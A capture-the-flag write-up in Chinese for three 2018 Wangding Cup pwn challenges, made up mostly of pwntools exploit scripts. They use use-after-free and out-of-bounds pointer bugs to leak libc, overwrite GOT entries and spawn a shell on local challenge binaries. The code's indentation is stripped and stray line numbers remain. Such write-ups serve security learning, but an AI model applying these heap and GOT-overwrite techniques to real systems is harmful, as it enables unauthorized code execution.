[2018网鼎杯] 半决赛writesup(pwn)

boorsheet

  • 利用uaf劫持程序控制流
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
from pwn import *

context.log_level = 'debug'

def create_char(length,name,type_char):
p.recvuntil('choice : ')
p.sendline('1')
p.recvuntil(' name :')
p.sendline(str(length))
p.recvuntil('character :')
p.send(name)
p.recvuntil('character :')
p.sendline(type_char)

def view_char():
p.recvuntil('choice : ')
p.sendline('2')

def delete_char(index):
p.recvuntil('choice : ')
p.sendline('3')
p.recvuntil('to eat:')
p.sendline(str(index))

def clean():
p.recvuntil('choice : ')
p.sendline('4')

def yincang():
p.recvuntil('choice : ')
p.sendline('1337')

def new(size,name,content):
p.recvuntil('$ ')
p.sendline('new')
p.recvuntil('size:')
p.sendline(str(size))
p.recvuntil('name:')
p.sendline(name)
p.recvuntil('content:')
p.sendline(content)

def edit(index,name,content):
p.recvuntil('$ ')
p.sendline('edit')
p.recvuntil('index:')
p.sendline(str(index))
p.recvuntil('name:')
p.sendline(name)
p.recvuntil('content:')
p.sendline(content)

def delete(index):
p.recvuntil('$ ')
p.sendline('delete')
p.recvuntil('index:')
p.sendline(str(index))

def show(index):
p.recvuntil('$ ')
p.sendline('show')
p.recvuntil('index:')
p.sendline(str(index))

def mark(index,mark_info):
p.recvuntil('$ ')
p.sendline('mark')
p.recvuntil('mark:')
p.sendline(str(index))
p.recvuntil('info:')
p.sendline(mark_info)

def show_mark(index):
p.recvuntil('$ ')
p.sendline('show_mark')
p.recvuntil('index:')
p.sendline(str(index))

def delete_mark(index):
p.recvuntil('$ ')
p.sendline('delete_mark')
p.recvuntil('index:')
p.sendline(str(index))

def edit_mark(index):
p.recvuntil('$ ')
p.sendline('edit_mark')
p.recvuntil('index:')
p.sendline(str(index))

p = process('./boorsheet')
elf = ELF('./boorsheet')
puts_got = elf.got['puts']

yincang()
new(0x10,'a','1')
mark(0,'b')

#use uaf to hijack note->content --> struct_mark
delete_mark(0)
#leak elf_base
new(0x18,'b','2'*0xf)
show(1)
p.recvuntil('2'*0xf+'\x00')
elf_base = u64(p.recv(8)) - 0x11E6
log.success('elf_base addr : 0x%x'%elf_base)
#leak libc_base
edit(1,'b',p32(0) + p32(0) + p64(puts_got+elf_base)[:6])
show_mark(0)
offset_puts = 0x000000000006f690
offset_system = 0x0000000000045390
offset_str_bin_sh = 0x18cd57
libc_base = u64(p.recv(6).ljust(8,'\x00')) - offset_puts
log.success('libc_base addr : 0x%x'%libc_base)
system_addr = libc_base + offset_system
binsh_addr = libc_base + offset_str_bin_sh
log.success('system addr : 0x%x'%system_addr)
log.success('binsh addr : 0x%x'%binsh_addr)

#hijack *puts_function -> system('/bin/sh\x00')
edit(1,'b',p32(0) + p32(0) + p64(binsh_addr) + p64(system_addr))
#trigger system('/bin/sh\x00')
show_mark(0)


p.interactive()

`

frainbuck

  • 利用类似brainfuck进行数组越界泄漏libc改got表
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *

context.log_level = 'debug'

p = process('./frainbuck')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

stdout = 0x602080
ptr_data = 0x6020C0
exit_got = 0x602060
_IO_2_1_stdout_offset = libc.symbols['_IO_2_1_stdout_']

'''
> ++ptr;
< --ptr;
+ ++*ptr;
- --*ptr;
. putchar(*ptr);
, *ptr=getchar();
[ while(*ptr){
] }
'''

payload = '<'*(ptr_data - stdout)
payload += '[.>]'
payload += '<'*6
payload += '<'*(stdout - exit_got)
payload += ',[>,]'

#gdb.attach(p,'b *0x04009A9')
p.recvuntil('code: ')
p.sendline(payload)

libc_base = u64(p.recv(6).ljust(8,'\x00')) - _IO_2_1_stdout_offset
one_gadget = libc_base + 0x45216
log.success('libc_base addr : 0x%x'%libc_base)
log.success('one_gadget addr : 0x%x'%one_gadget)

p.send(p64(one_gadget))

p.interactive()

RexMe

  • uaf利用name泄漏libc,改写got表
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
from pwn import *

context.log_level = 'debug'

def login(name):
p.recvuntil('choice:')
p.sendline('1')
p.recvuntil('name:')
p.send(name+'\x00')

def register(size,name,age,des):
p.recvuntil('choice:')
p.sendline('2')
p.recvuntil(' size:')
p.sendline(str(size))
p.recvuntil('name:')
p.send(name)
p.recvuntil('age:')
p.sendline(str(age))
p.recvuntil('description:')
p.send(des)

def view_profile():
p.recvuntil('choice:')
p.sendline('1')

def updata_profile(name,age,des):
p.recvuntil('choice:')
p.sendline('2')
p.recvuntil('name:')
p.send(name)
p.recvuntil('age:')
p.sendline(str(age))
p.recvuntil('description:')
p.send(des)

def add_or_delete_friend(name,a_d):
p.recvuntil('choice:')
p.sendline('3')
p.recvuntil('name:')
p.send(name+'\x00')
p.recvuntil('this friend?(a/d)')
p.sendline(a_d)

def send_a_message(name,title,content):
p.recvuntil('choice:')
p.sendline('4')
p.recvuntil('msg to:')
p.send(name+'\x00')
p.recvuntil('title:')
p.send(title)
p.recvuntil('content:')
p.send(content)

def view_your_message():
p.recvuntil('choice:')
p.sendline('5')

def logout():
p.recvuntil('choice:')
p.sendline('6')


p = process('./RexMe')
elf = ELF('./RexMe')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

strdup_plt = 0x4007f6
strdup_got = elf.got['strdup']

register(10,'a'*8,20,'a')
register(10,'b'*8,20,'b')
#gdb.attach(p,'b *0x40142F')
login('a'*8)
add_or_delete_friend('b'*8,'a')
add_or_delete_friend('b'*8,'d')
logout()

#leak libc
register(10,p64(strdup_got),20,'b')
login(p64(strdup_plt))
send_a_message('a'*8,'a','a')
view_profile()
offset_strdup = 0x000000000008b470
offset_system = 0x0000000000045390
p.recvuntil('Username:')
libc_base = u64(p.recv(6).ljust(8,'\x00')) - offset_strdup
log.success('libc_base addr : 0x%x'%libc_base)
one_gadget = libc_base + 0x45216
log.success('one_gadget addr : 0x%x'%one_gadget)
system_addr = libc_base + offset_system
log.success('system addr : 0x%x'%system_addr)

#hijack strdup_got -> system_addr
updata_profile(p64(system_addr),'20','b')

#system('/bin/sh\x00')
p.recvuntil('choice:')
p.sendline('4')
p.recvuntil('msg to:')
p.send('a'*8+'\x00')
p.recvuntil('title:')
p.send('/bin/sh\x00')
p.interactive()